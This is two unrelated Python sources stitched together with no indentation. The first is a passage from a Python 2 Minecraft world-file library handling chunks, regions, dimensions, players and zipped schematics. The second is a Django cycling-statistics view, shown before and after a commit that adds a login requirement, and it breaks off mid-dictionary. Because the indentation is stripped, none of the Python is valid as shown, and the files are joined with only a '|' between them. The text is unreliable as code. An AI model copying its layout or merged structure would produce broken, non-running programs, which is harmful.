for ch in startingDirtyChunks:
ch.needsLighting = False;
class MCInfdevOldLevel(ChunkedLevelMixin, EntityLevel):
materials = alphaMaterials;
isInfinite = True
parentWorld = None;
dimNo = 0;
Height = 128
@property
def displayName(self):
#shortname = os.path.basename(self.filename);
#if shortname == "level.dat":
shortname = os.path.basename(os.path.dirname(self.filename))
return shortname
@classmethod
def _isLevel(cls, filename):
join = os.path.join
exists = os.path.exists
if exists(join(filename, "chunks.dat")): return False # exclude Pocket Edition folders
if not os.path.isdir(filename):
f = os.path.basename(filename)
if f not in ("level.dat", "level.dat_old"): return False
filename = os.path.dirname(filename)
files = os.listdir(filename);
if "level.dat" in files or "level.dat_old" in files:
return True;
return False
def getWorldBounds(self):
if self.chunkCount == 0:
return BoundingBox((0, 0, 0), (0, 0, 0))
allChunksArray = array(list(self.allChunks), dtype='int32')
mincx = min(allChunksArray[:, 0])
maxcx = max(allChunksArray[:, 0])
mincz = min(allChunksArray[:, 1])
maxcz = max(allChunksArray[:, 1])
origin = (mincx << 4, 0, mincz << 4)
size = ((maxcx - mincx + 1) << 4, self.Height, (maxcz - mincz + 1) << 4)
return BoundingBox(origin, size)
def __str__(self):
return "MCInfdevOldLevel(\"" + os.path.split(self.worldDir)[1] + "\")"
def TagProperty(tagName, tagType, defaultValueFunc=lambda self:None):
def getter(self):
if tagName not in self.root_tag[Data]:
self.root_tag[Data][tagName] = tagType(defaultValueFunc(self))
return self.root_tag[Data][tagName].value
def setter(self, val):
self.root_tag[Data][tagName] = tagType(value=val)
return property(getter, setter)
SizeOnDisk = TagProperty('SizeOnDisk', TAG_Long)
RandomSeed = TagProperty('RandomSeed', TAG_Long)
Time = TagProperty('Time', TAG_Long); """ Age of the world in ticks. 20 ticks per second; 24000 ticks per day."""
LastPlayed = TagProperty('LastPlayed', TAG_Long, lambda self:long(time.time() * 1000))
LevelName = TagProperty('LevelName', TAG_String, lambda self:self.displayName)
MapFeatures = TagProperty('MapFeatures', TAG_Byte, lambda self:1)
GameType = TagProperty('GameType', TAG_Int, lambda self:0) #0 for survival, 1 for creative
GAMETYPE_SURVIVAL = 0
GAMETYPE_CREATIVE = 1
_bounds = None
@property
def bounds(self):
if self._bounds is None: self._bounds = self.getWorldBounds();
return self._bounds
@property
def size(self):
return self.bounds.size
def close(self):
for rf in (self.regionFiles or {}).values():
rf.close();
self.regionFiles = {}
self._allChunks = None
self._loadedChunks = {}
def create(self, filename, random_seed, last_played):
if filename == None:
raise ValueError, "Can't create an Infinite level without a filename!"
#create a new level
root_tag = TAG_Compound();
root_tag[Data] = TAG_Compound();
root_tag[Data][SpawnX] = TAG_Int(0)
root_tag[Data][SpawnY] = TAG_Int(2)
root_tag[Data][SpawnZ] = TAG_Int(0)
if last_played is None:
last_played = long(time.time() * 1000)
if random_seed is None:
random_seed = long(random.random() * 0xffffffffffffffffL) - 0x8000000000000000L
self.root_tag = root_tag;
root_tag[Data]['version'] = TAG_Int(19132)
self.LastPlayed = long(last_played)
self.RandomSeed = long(random_seed)
self.SizeOnDisk = 0
self.Time = 1
self.LevelName = os.path.basename(self.worldDir)
### if singleplayer:
self.createPlayer("Player")
if not os.path.exists(self.worldDir):
os.mkdir(self.worldDir)
def createPlayer(self, playerName):
if playerName == "Player":
playerTag = self.root_tag[Data].setdefault(playerName, TAG_Compound())
else:
playerTag = TAG_Compound()
playerTag['Air'] = TAG_Short(300);
playerTag['AttackTime'] = TAG_Short(0)
playerTag['DeathTime'] = TAG_Short(0);
playerTag['Fire'] = TAG_Short(-20);
playerTag['Health'] = TAG_Short(20);
playerTag['HurtTime'] = TAG_Short(0);
playerTag['Score'] = TAG_Int(0);
playerTag['FallDistance'] = TAG_Float(0)
playerTag['OnGround'] = TAG_Byte(0)
playerTag['Inventory'] = TAG_List()
playerTag['Motion'] = TAG_List([TAG_Double(0) for i in range(3)])
playerTag['Pos'] = TAG_List([TAG_Double([0.5, 2.8, 0.5][i]) for i in range(3)])
playerTag['Rotation'] = TAG_List([TAG_Float(0), TAG_Float(0)])
if playerName != "Player":
self.playerTagCache.save(self.getPlayerPath(playerName))
def __init__(self, filename=None, create=False, random_seed=None, last_played=None):
"""
Load an Alpha level from the given filename. It can point to either
a level.dat or a folder containing one. If create is True, it will
also create the world using the random_seed and last_played arguments.
If they are none, a random 64-bit seed will be selected for RandomSeed
and long(time.time()*1000) will be used for LastPlayed.
If you try to create an existing world, its level.dat will be replaced.
"""
self.Length = 0
self.Width = 0
self.Height = 128 #subject to change?
self.playerTagCache = {}
self.players = []
if not os.path.exists(filename):
if not create:
raise IOError, 'File not found'
self.worldDir = filename
os.mkdir(self.worldDir)
if os.path.isdir(filename):
self.worldDir = filename
else:
if os.path.basename(filename) in ("level.dat", "level.dat_old"):
self.worldDir = os.path.dirname(filename)
else:
raise IOError, 'File is not a Minecraft Alpha world'
self.filename = os.path.join(self.worldDir, "level.dat")
self.regionDir = os.path.join(self.worldDir, "region")
if not os.path.exists(self.regionDir):
os.mkdir(self.regionDir)
#maps (cx,cz) pairs to InfdevChunks
self._loadedChunks = {}
self._allChunks = None
self.dimensions = {};
self.regionFiles = {}
#used to limit memory usage
self.loadedChunkQueue = dequeset()
self.decompressedChunkQueue = dequeset()
self.loadLevelDat(create, random_seed, last_played);
#attempt to support yMod
try:
self.Height = self.root_tag["Data"]["YLimit"].value
except:
pass
self.playersDir = os.path.join(self.worldDir, "players");
if os.path.isdir(self.playersDir):
self.players = [x[:-4] for x in os.listdir(self.playersDir) if x.endswith(".dat")]
if "Player" in self.root_tag["Data"]:
self.players.append("Player")
self.preloadDimensions();
#self.preloadChunkPositions();
def __del__(self):
self.close()
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
if create:
self.create(self.filename, random_seed, last_played);
self.saveInPlace();
else:
try:
self.root_tag = nbt.load(self.filename)
except Exception, e:
filename_old = os.path.join(self.worldDir, "level.dat_old")
info("Error loading level.dat, trying level.dat_old ({0})".format(e))
try:
self.root_tag = nbt.load(filename_old)
info("level.dat restored from backup.")
self.saveInPlace();
except Exception, e:
traceback.print_exc()
print repr(e)
info("Error loading level.dat_old. Initializing with defaults.");
self.create(self.filename, random_seed, last_played);
def preloadDimensions(self):
worldDirs = os.listdir(self.worldDir);
for dirname in worldDirs :
if dirname.startswith("DIM"):
try:
dimNo = int(dirname[3:]);
info("Found dimension {0}".format(dirname))
dim = MCAlphaDimension(self, dimNo);
self.dimensions[dimNo] = dim;
except Exception, e:
error(u"Error loading dimension {0}: {1}".format(dirname, e))
def getDimension(self, dimNo):
if self.dimNo != 0:
return self.parentWorld.getDimension(dimNo)
if dimNo == 0:
return self
if dimNo in self.dimensions: return self.dimensions[dimNo]
dim = MCAlphaDimension(self, dimNo, create=True)
self.dimensions[dimNo] = dim
return dim
def getRegionForChunk(self, cx, cz):
rx = cx >> 5
rz = cz >> 5
return self.getRegionFile(rx, rz)
def preloadChunkPositions(self):
if self.version == 19132:
self.preloadRegions()
else:
self.preloadChunkPaths()
def findRegionFiles(self):
regionDir = os.path.join(self.worldDir, "region")
if not os.path.exists(regionDir):
os.mkdir(regionDir)
regionFiles = os.listdir(regionDir)
for filename in regionFiles:
yield os.path.join(regionDir, filename)
def loadRegionFile(self, filepath):
filename = os.path.basename(filepath)
bits = filename.split('.')
if len(bits) < 4 or bits[0] != 'r' or bits[3] != "mcr": return None
try:
rx, rz = map(int, bits[1:3])
except ValueError:
return None
return MCRegionFile(filepath, (rx, rz))
def getRegionFile(self, rx, rz):
regionFile = self.regionFiles.get((rx, rz))
if regionFile: return regionFile
regionFile = MCRegionFile(self.regionFilename(rx, rz), (rx, rz))
self.regionFiles[rx, rz] = regionFile;
return regionFile
def unloadRegions(self):
self.close()
def preloadRegions(self):
info(u"Scanning for regions...")
self._allChunks = set()
for filepath in self.findRegionFiles():
regionFile = self.loadRegionFile(filepath)
if regionFile is None: continue
if regionFile.offsets.any():
rx, rz = regionFile.regionCoords
self.regionFiles[rx, rz] = regionFile
for index, offset in enumerate(regionFile.offsets):
if offset:
cx = index & 0x1f
cz = index >> 5
cx += rx << 5
cz += rz << 5
self._allChunks.add((cx, cz))
else:
info(u"Removing empty region file {0}".format(filepath))
regionFile.close()
os.unlink(regionFile.path)
def preloadChunkPaths(self):
info(u"Scanning for chunks...")
worldDirs = os.listdir(self.worldDir);
self._allChunks = set()
for dirname in worldDirs:
if(dirname in self.dirhashes):
subdirs = os.listdir(os.path.join(self.worldDir, dirname));
for subdirname in subdirs:
if(subdirname in self.dirhashes):
filenames = os.listdir(os.path.join(self.worldDir, dirname, subdirname));
#def fullname(filename):
#return os.path.join(self.worldDir, dirname, subdirname, filename);
#fullpaths = map(fullname, filenames);
bits = map(lambda x:x.split('.'), filenames);
chunkfilenames = filter(lambda x:(len(x) == 4 and x[0].lower() == 'c' and x[3].lower() == 'dat'), bits)
for c in chunkfilenames:
try:
cx, cz = (decbase36(c[1]), decbase36(c[2]))
except Exception, e:
info(u'Skipped file {0} ({1})'.format(u'.'.join(c), e))
continue
self._allChunks.add((cx, cz))
#
info(u"Found {0} chunks.".format(len(self._allChunks)))
def compress(self):
self.compressAllChunks();
def compressAllChunks(self):
for ch in self._loadedChunks.itervalues():
ch.compress();
def compressChunk(self, cx, cz):
if not (cx, cz) in self._loadedChunks: return; #not an error
self._loadedChunks[cx, cz].compress()
decompressedChunkLimit = 2048 # about 320 megabytes
loadedChunkLimit = 8192 # from 8mb to 800mb depending on chunk contents
def chunkDidCompress(self, chunk):
self.decompressedChunkQueue.discard(chunk)
def chunkDidDecompress(self, chunk):
if not chunk in self.decompressedChunkQueue:
self.decompressedChunkQueue.append(chunk);
if self.decompressedChunkLimit and (len(self.decompressedChunkQueue) > self.decompressedChunkLimit):
oldestChunk = self.decompressedChunkQueue[0];
oldestChunk.compress(); #calls chunkDidCompress
def chunkDidUnload(self, chunk):
self.loadedChunkQueue.discard(chunk)
def chunkDidLoad(self, chunk):
if chunk not in self.loadedChunkQueue:
self.loadedChunkQueue.append(chunk);
if self.loadedChunkLimit and (len(self.loadedChunkQueue) > self.loadedChunkLimit):
oldestChunk = self.loadedChunkQueue[0];
oldestChunk.unload(); #calls chunkDidUnload
@property
@decompress_first
def version(self):
if 'version' in self.root_tag['Data']:
return self.root_tag['Data']['version'].value
else:
return None
@version.setter
@decompress_first
def version(self, val):
if 'version' in self.root_tag['Data']:
self.root_tag['Data']['version'].value = val
@version.deleter
@decompress_first
def version(self):
self.root_tag['Data'].pop('version')
def _loadChunk(self, chunk):
""" load the chunk data from disk, and set the chunk's compressedTag
and root_tag"""
cx, cz = chunk.chunkPosition
try:
if self.version:
regionFile = self.getRegionForChunk(cx, cz)
regionFile.loadChunk(chunk)
else:
with file(chunk.filename, 'rb') as f:
cdata = f.read()
chunk.compressedTag = cdata
data = gunzip(cdata)
chunk.root_tag = nbt.load(buf=data)
except Exception, e:
raise ChunkMalformed, "Chunk {0} had an error: {1!r}".format(chunk.chunkPosition, e), sys.exc_info()[2]
def _saveChunk(self, chunk):
cx, cz = chunk.chunkPosition
if self.version:
regionFile = self.getRegionForChunk(cx, cz)
regionFile.saveChunk(chunk)
else:
dir1 = os.path.dirname(chunk.filename)
dir2 = os.path.dirname(dir1)
if not os.path.exists(dir2):
os.mkdir(dir2)
if not os.path.exists(dir1):
os.mkdir(dir1)
chunk.compress()
with file(chunk.filename, 'wb') as f:
f.write(chunk.compressedTag)
def discardAllChunks(self):
""" clear lots of memory, fast. """
def chunkFilenameAt(self, x, y, z):
cx = x >> 4
cz = z >> 4
return self._loadedChunks.get((cx, cz)).filename
def dirhash(self, n):
return self.dirhashes[n % 64];
def _dirhash(self):
n = self
n = n % 64;
s = u"";
if(n >= 36):
s += u"1";
n -= 36;
s += u"0123456789abcdefghijklmnopqrstuvwxyz"[n]
return s;
dirhashes = [_dirhash(n) for n in range(64)];
def regionFilename(self, rx, rz):
s = os.path.join(self.regionDir,
"r.%s.%s.mcr" % ((rx), (rz)));
return s;
def chunkFilename(self, x, z):
s = os.path.join(self.worldDir, self.dirhash(x), self.dirhash(z),
"c.%s.%s.dat" % (base36(x), base36(z)));
return s;
def extractChunksInBox(self, box, parentFolder):
for cx, cz in box.chunkPositions:
if self.containsChunk(cx, cz):
self.extractChunk(cx, cz, parentFolder)
def extractChunk(self, cx, cz, parentFolder):
if not os.path.exists(parentFolder):
os.mkdir(parentFolder)
chunkFilename = self.chunkFilename(cx, cz)
outputFile = os.path.join(parentFolder, os.path.basename(chunkFilename))
chunk = self.getChunk(cx, cz)
if chunk.compressMode == MCRegionFile.VERSION_GZIP:
chunk.compress()
data = chunk.compressedTag;
else:
chunk.decompress()
chunk.packChunkData()
data = chunk.compressTagGzip(chunk.root_tag)
with file(outputFile, "wb") as f:
f.write(data)
def heightMapAt(self, x, z):
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
heightMap = ch.HeightMap
return heightMap[zInChunk, xInChunk];
#the heightmap is ordered differently because in minecraft it is a flat array
@property
def loadedChunks(self):
return self._loadedChunks.keys();
@property
def chunkCount(self):
"""Returns the number of chunks in the level. May initiate a costly
chunk scan."""
if self._allChunks is None:
self.preloadChunkPositions()
return len(self._allChunks)
@property
def allChunks(self):
"""Iterates over (xPos, zPos) tuples, one for each chunk in the level.
May initiate a costly chunk scan."""
if self._allChunks is None:
self.preloadChunkPositions()
return self._allChunks.__iter__();
def _getChunkUnloaded(self, cx, cz):
"""return the InfdevChunk object at the given position. because loading
the chunk is done later, accesses to chunk attributes may
raise ChunkMalformed"""
if not self.containsChunk(cx, cz) :
raise ChunkNotPresent, (cx, cz);
if not (cx, cz) in self._loadedChunks:
self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz));
return self._loadedChunks[cx, cz]
def chunkIsLoaded(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].isLoaded()
return False
def chunkIsCompressed(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].isCompressed()
return False
def chunkIsDirty(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].dirty
return False
def getChunk(self, cx, cz):
""" read the chunk from disk, load it, and return it.
decompression and unpacking is done lazily."""
c = self._getChunkUnloaded(cx, cz)
c.load();
if not (cx, cz) in self._loadedChunks:
raise ChunkMalformed, "Chunk {0} malformed".format((cx, cz))
self.world.malformedChunk(*self.chunkPosition);
return c;
def markDirtyChunk(self, cx, cz):
if not (cx, cz) in self._loadedChunks: return
self._loadedChunks[cx, cz].chunkChanged();
def markDirtyBox(self, box):
for cx, cz in box.chunkPositions:
self.markDirtyChunk(cx, cz)
def saveInPlace(self):
for level in self.dimensions.itervalues():
level.saveInPlace(True);
dirtyChunkCount = 0;
if self._loadedChunks:
for chunk in self._loadedChunks.itervalues():
if chunk.dirty:
dirtyChunkCount += 1;
chunk.save();
for path, tag in self.playerTagCache.iteritems():
tag.saveGzipped(path)
self.playerTagCache = {}
self.root_tag.save(self.filename);
info(u"Saved {0} chunks".format(dirtyChunkCount))
def addEntity(self, entityTag):
assert isinstance(entityTag, TAG_Compound)
x, y, z = map(lambda x:int(floor(x)), Entity.pos(entityTag))
try:
chunk = self.getChunk(x >> 4, z >> 4)
except (ChunkNotPresent, ChunkMalformed), e:
return None
# raise Error, can't find a chunk?
chunk.addEntity(entityTag);
chunk.dirty = True
def tileEntityAt(self, x, y, z):
chunk = self.getChunk(x >> 4, z >> 4)
return chunk.tileEntityAt(x, y, z)
def addTileEntity(self, tileEntityTag):
assert isinstance(tileEntityTag, TAG_Compound)
if not 'x' in tileEntityTag: return
x, y, z = TileEntity.pos(tileEntityTag)
try:
chunk = self.getChunk(x >> 4, z >> 4)
except (ChunkNotPresent, ChunkMalformed):
return
# raise Error, can't find a chunk?
chunk.addTileEntity(tileEntityTag)
chunk.dirty = True
def getEntitiesInBox(self, box):
entities = []
for chunk, slices, point in self.getChunkSlices(box):
entities += chunk.getEntitiesInBox(box)
return entities
def removeEntitiesInBox(self, box):
count = 0;
for chunk, slices, point in self.getChunkSlices(box):
count += chunk.removeEntitiesInBox(box);
info("Removed {0} entities".format(count))
return count;
def removeTileEntitiesInBox(self, box):
count = 0;
for chunk, slices, point in self.getChunkSlices(box):
count += chunk.removeTileEntitiesInBox(box);
info("Removed {0} tile entities".format(count))
return count;
def containsPoint(self, x, y, z):
if y < 0 or y > 127: return False;
return self.containsChunk(x >> 4, z >> 4)
def containsChunk(self, cx, cz):
if self._allChunks is not None: return (cx, cz) in self._allChunks;
if (cx, cz) in self._loadedChunks: return True;
if self.version:
rx, rz = cx>>5, cz>>5
if not os.path.exists(self.regionFilename(rx, rz)): return False
return self.getRegionFile(rx,rz).containsChunk(cx, cz)
else:
return os.path.exists(self.chunkFilename(cx, cz))
def malformedChunk(self, cx, cz):
debug(u"Forgetting malformed chunk {0} ({1})".format((cx, cz), self.chunkFilename(cx, cz)))
if (cx, cz) in self._loadedChunks:
del self._loadedChunks[(cx, cz)]
self._bounds = None
def createChunk(self, cx, cz):
if self.containsChunk(cx, cz): raise ValueError, "{0}:Chunk {1} already present!".format(self, (cx, cz))
if self._allChunks is not None:
self._allChunks.add((cx, cz))
self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz), create=True)
self._bounds = None
def createChunks(self, chunks):
i = 0;
ret = [];
for cx, cz in chunks:
i += 1;
if not self.containsChunk(cx, cz):
ret.append((cx, cz))
self.createChunk(cx, cz);
self.compressChunk(cx, cz);
assert self.containsChunk(cx, cz), "Just created {0} but it didn't take".format((cx, cz))
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
info("Created {0} chunks.".format(len(ret)))
return ret;
def createChunksInBox(self, box):
info(u"Creating {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
return self.createChunks(box.chunkPositions);
def deleteChunk(self, cx, cz):
if self._allChunks is not None: self._allChunks.discard((cx, cz))
if (cx, cz) in self._loadedChunks:
del self._loadedChunks[(cx, cz)]
if self.version:
r = cx >> 5, cz >> 5
rf = self.getRegionFile(*r)
if rf:
rf.setOffset(cx & 0x1f , cz & 0x1f, 0)
if (rf.offsets == 0).all():
rf.close()
os.unlink(rf.path)
del self.regionFiles[r]
else:
os.unlink(self.chunkFilename(cx, cz))
self._bounds = None
def deleteChunksInBox(self, box):
info(u"Deleting {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
i = 0;
ret = [];
for cx, cz in itertools.product(xrange(box.mincx, box.maxcx), xrange(box.mincz, box.maxcz)):
i += 1;
if self.containsChunk(cx, cz):
self.deleteChunk(cx, cz);
ret.append((cx, cz))
assert not self.containsChunk(cx, cz), "Just deleted {0} but it didn't take".format((cx, cz))
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
return ret
spawnxyz = ["SpawnX", "SpawnY", "SpawnZ"]
def playerSpawnPosition(self, player=None):
"""
xxx if player is None then it gets the default spawn position for the world
if player hasn't used a bed then it gets the default spawn position
"""
dataTag = self.root_tag["Data"]
if player is None:
playerSpawnTag = dataTag
else:
playerSpawnTag = self.getPlayerTag(player)
return [playerSpawnTag.get(i, dataTag[i]).value for i in self.spawnxyz]
def setPlayerSpawnPosition(self, pos, player=None):
""" xxx if player is None then it sets the default spawn position for the world """
if player is None:
playerSpawnTag = self.root_tag["Data"]
else:
playerSpawnTag = self.getPlayerTag(player)
for name, val in zip(self.spawnxyz, pos):
playerSpawnTag[name] = nbt.TAG_Int(val);
def getPlayerPath(self, player):
assert player != "Player"
return os.path.join(self.playersDir, player + ".dat")
def getPlayerTag(self, player="Player"):
if player == "Player":
if player in self.root_tag["Data"]:
#single-player world
return self.root_tag["Data"]["Player"];
raise PlayerNotFound, player
else:
playerFilePath = self.getPlayerPath(player)
if os.path.exists(playerFilePath):
#multiplayer world, found this player
playerTag = self.playerTagCache.get(playerFilePath)
if playerTag is None:
playerTag = nbt.load(playerFilePath)
self.playerTagCache[playerFilePath] = playerTag
return playerTag
else:
raise PlayerNotFound, "{0}".format(player)
#return None
def getPlayerDimension(self, player="Player"):
playerTag = self.getPlayerTag(player)
if "Dimension" not in playerTag: return 0;
return playerTag["Dimension"].value
def setPlayerDimension(self, d, player="Player"):
playerTag = self.getPlayerTag(player)
if "Dimension" not in playerTag: playerTag["Dimension"] = nbt.TAG_Int(0);
playerTag["Dimension"].value = d;
def setPlayerPosition(self, pos, player="Player"):
posList = nbt.TAG_List([nbt.TAG_Double(p) for p in pos]);
playerTag = self.getPlayerTag(player)
playerTag["Pos"] = posList
def getPlayerPosition(self, player="Player"):
playerTag = self.getPlayerTag(player)
posList = playerTag["Pos"];
pos = map(lambda x:x.value, posList);
return pos;
def setPlayerOrientation(self, yp, player="Player"):
self.getPlayerTag(player)["Rotation"] = nbt.TAG_List([nbt.TAG_Float(p) for p in yp])
def getPlayerOrientation(self, player="Player"):
""" returns (yaw, pitch) """
yp = map(lambda x:x.value, self.getPlayerTag(player)["Rotation"]);
y, p = yp;
if p == 0: p = 0.000000001;
if p == 180.0: p -= 0.000000001;
yp = y, p;
return array(yp);
def setPlayerAbilities(self, gametype, player="Player"):
playerTag = self.getPlayerTag(player)
# Check for the Abilities tag. It will be missing in worlds from before
# Beta 1.9 Prerelease 5.
if not 'abilities' in playerTag:
playerTag['abilities'] = TAG_Compound()
# Assumes creative (1) is the only mode with these abilities set,
# which is true for now. Future game modes may not hold this to be
# true, however.
if gametype == 1:
playerTag['abilities']['instabuild'] = TAG_Byte(1)
playerTag['abilities']['mayfly'] = TAG_Byte(1)
playerTag['abilities']['invulnerable'] = TAG_Byte(1)
else:
playerTag['abilities']['flying'] = TAG_Byte(0)
playerTag['abilities']['instabuild'] = TAG_Byte(0)
playerTag['abilities']['mayfly'] = TAG_Byte(0)
playerTag['abilities']['invulnerable'] = TAG_Byte(0)
def setPlayerGameType(self, gametype, player="Player"):
playerTag = self.getPlayerTag(player)
# This annoyingly works differently between single- and multi-player.
if player == "Player":
self.GameType = gametype
self.setPlayerAbilities(gametype, player)
else:
playerTag['playerGameType'] = TAG_Int(gametype)
self.setPlayerAbilities(gametype, player)
def getPlayerGameType(self, player="Player"):
if player == "Player":
return self.GameType
else:
playerTag = self.getPlayerTag(player)
return playerTag["playerGameType"].value
class MCAlphaDimension (MCInfdevOldLevel):
def __init__(self, parentWorld, dimNo, create=False):
filename = os.path.join(parentWorld.worldDir, "DIM" + str(int(dimNo)))
self.parentWorld = parentWorld;
MCInfdevOldLevel.__init__(self, filename, create)
self.dimNo = dimNo
self.filename = parentWorld.filename
self.playersDir = parentWorld.playersDir;
self.players = parentWorld.players
self.playerTagCache = parentWorld.playerTagCache
@property
def root_tag(self): return self.parentWorld.root_tag;
def __str__(self):
return "MCAlphaDimension({0}, {1})".format(self.parentWorld, self.dimNo)
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
pass;
def preloadDimensions(self):
pass
def create(self, *args, **kw):
if not os.path.exists(self.worldDir):
os.mkdir(self.worldDir)
dimensionNames = { -1: "Nether", 1: "The End"};
@property
def displayName(self):
return u"{0} ({1})".format(self.parentWorld.displayName,
self.dimensionNames.get(self.dimNo, "Dimension %d" % self.dimNo))
def saveInPlace(self, saveSelf=False):
"""saving the dimension will save the parent world, which will save any
other dimensions that need saving. the intent is that all of them can
stay loaded at once for fast switching """
if saveSelf:
MCInfdevOldLevel.saveInPlace(self);
else:
self.parentWorld.saveInPlace();
from zipfile import ZipFile, is_zipfile
import tempfile
class ZipSchematic (MCInfdevOldLevel):
def __init__(self, filename):
tempdir = tempfile.mktemp("schematic")
zf = ZipFile(filename)
self.zipfile = zf
zf.extract("level.dat", tempdir)
MCInfdevOldLevel.__init__(self, tempdir)
self.filename = filename
try:
schematicDat = os.path.join(tempdir, "schematic.dat")
with closing(self.zipfile.open("schematic.dat")) as f:
schematicDat = nbt.load(buf=gunzip(f.read()))
self.Width = schematicDat['Width'].value;
self.Height = schematicDat['Height'].value;
self.Length = schematicDat['Length'].value;
except Exception, e:
print "Exception reading schematic.dat, skipping: {0!r}".format(e)
self.Width = 0
self.Height = 128
self.Length = 0
if "Materials" in schematicDat:
self.materials = namedMaterials[schematicDat["Materials"].value]
def close(self):
MCInfdevOldLevel.close(self)
self.zipfile.close()
shutil.rmtree(self.worldDir, True)
def getWorldBounds(self):
return BoundingBox((0, 0, 0), (self.Width, self.Height, self.Length))
@classmethod
def _isLevel(cls, filename):
return is_zipfile(filename)
def _loadChunk(self, chunk):
if self.version:
return MCInfdevOldLevel._loadChunk(self, chunk)
else:
cdata = self.zipfile.read(chunk.chunkFilename)
chunk.compressedTag = cdata
chunk.decompress()
def _saveChunk(self, chunk):
if self.version:
return MCInfdevOldLevel._saveChunk(self, chunk)
else:
raise NotImplementedError, "Cannot save chunk-format zipfiles!"
def saveInPlace(self):
self.saveToFile(self.filename)
def saveToFile(self, filename):
tempfile = filename + ".new"
from schematic import zipdir
zipdir(self.worldDir, tempfile)
if os.path.exists(filename):
os.remove(filename)
shutil.copy(tempfile, filename)
def containsChunk(self, cx, cz):
return (cx, cz) in self.allChunks
def preloadRegions(self):
self.zipfile.extractall(self.worldDir)
self.regionFiles = {}
MCInfdevOldLevel.preloadRegions(self)
def preloadChunkPaths(self):
info(u"Scanning for chunks...")
self._allChunks = set()
infos = self.zipfile.infolist()
names = [i.filename.split('/') for i in infos]
goodnames = [n for n in names if len(n) == 3 and n[0] in self.dirhashes and n[1] in self.dirhashes]
for name in goodnames:
c = name[2].split('.')
if len(c) == 4 and c[0].lower() == 'c' and c[3].lower() == 'dat':
try:
cx, cz = (decbase36(c[1]), decbase36(c[2]))
except Exception, e:
info('Skipped file {0} ({1})'.format('.'.join(c), e))
continue
#self._loadedChunks[ (cx, cz) ] = InfdevChunk(self, (cx, cz));
self._allChunks.add((cx, cz))
info(u"Found {0} chunks.".format(len(self._allChunks)))
def preloadDimensions(self):
pass
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
if create:
raise NotImplementedError, "Cannot save zipfiles yet!"
with closing(self.zipfile.open("level.dat")) as f:
with closing(gzip.GzipFile(fileobj=StringIO(f.read()))) as g:
self.root_tag = nbt.load(buf=g.read())
def chunkFilename(self, x, z):
s = "/".join((self.dirhash(x), self.dirhash(z),
"c.%s.%s.dat" % (base36(x), base36(z))));
return s;
|
from django.shortcuts import render
from django.http import HttpResponse
# Import models
from mapApp.models.incident import Incident
from mapApp.models.hazard import Hazard
from mapApp.models.theft import Theft
from mapApp.models.alert_area import AlertArea
from django.contrib.auth.models import User
from mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification
def stats(request):
user = request.user
# Get the user's alertable points in the last month
incidents = Incident.objects.all()#filter(incidentNotification__user=user.id)
nearmisses = incidents.filter(incident__contains="Near collision")
collisions = incidents.exclude(incident__contains="Near collision")
hazards = Hazard.objects.all()
thefts = Theft.objects.all()
rois = AlertArea.objects.filter(user=user.id)
# recent sets = points that intersect an rois as defined by user and are reported in last month
collisionsInPoly = Incident.objects.none()
nearmissesInPoly = Incident.objects.none()
hazardsInPoly = Hazard.objects.none()
theftsInPoly = Theft.objects.none()
# Find intersecting points
for g in rois:
collisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)
nearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)
hazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)
theftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)
context = {
'user': user,
'geofences': rois,
'collisions': collisions,
'nearmisses': nearmisses,
'hazards': hazards,
'thefts': thefts,
'collisionsInPoly': collisionsInPoly,
'nearmissesInPoly': nearmissesInPoly,
'hazardsInPoly': hazardsInPoly,
'theftsInPoly': theftsInPoly,
# 'collisionsOutPoly': collisions.exclude(pk__in=collisionsInPoly),
# 'nearmissesOutPoly': nearmisses.exclude(pk__in=nearmissesInPoly),
# 'hazardsOutPoly': hazards.exclude(pk__in=hazardsInPoly),
# 'theftsOutPoly': thefts.exclude(pk__in=theftsInPoly),
}
return render(request, 'mapApp/stats.html', context)
made stats page viewable by logged in people only
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
# Import models
from mapApp.models.incident import Incident
from mapApp.models.hazard import Hazard
from mapApp.models.theft import Theft
from mapApp.models.alert_area import AlertArea
from django.contrib.auth.models import User
from mapApp.models.alert_notification import IncidentNotification, HazardNotification, TheftNotification
@login_required
def stats(request):
user = request.user
# Get the user's alertable points in the last month
incidents = Incident.objects.all()#filter(incidentNotification__user=user.id)
nearmisses = incidents.filter(incident__contains="Near collision")
collisions = incidents.exclude(incident__contains="Near collision")
hazards = Hazard.objects.all()
thefts = Theft.objects.all()
rois = AlertArea.objects.filter(user=user.id)
# recent sets = points that intersect an rois as defined by user and are reported in last month
collisionsInPoly = Incident.objects.none()
nearmissesInPoly = Incident.objects.none()
hazardsInPoly = Hazard.objects.none()
theftsInPoly = Theft.objects.none()
# Find intersecting points
for g in rois:
collisionsInPoly = collisionsInPoly | collisions.filter(geom__intersects=g.geom)
nearmissesInPoly = nearmissesInPoly | nearmisses.filter(geom__intersects=g.geom)
hazardsInPoly = hazardsInPoly | hazards.filter(geom__intersects=g.geom)
theftsInPoly = theftsInPoly | thefts.filter(geom__intersects=g.geom)
context = {
'user': user,
'geofences': rois,
'collisions': collisions,
'nearmisses': nearmisses,
'hazards': hazards,
'thefts': thefts,
'collisionsInPoly': collisionsInPoly,
'nearmissesInPoly': nearmissesInPoly,
'hazardsInPoly': hazardsInPoly,
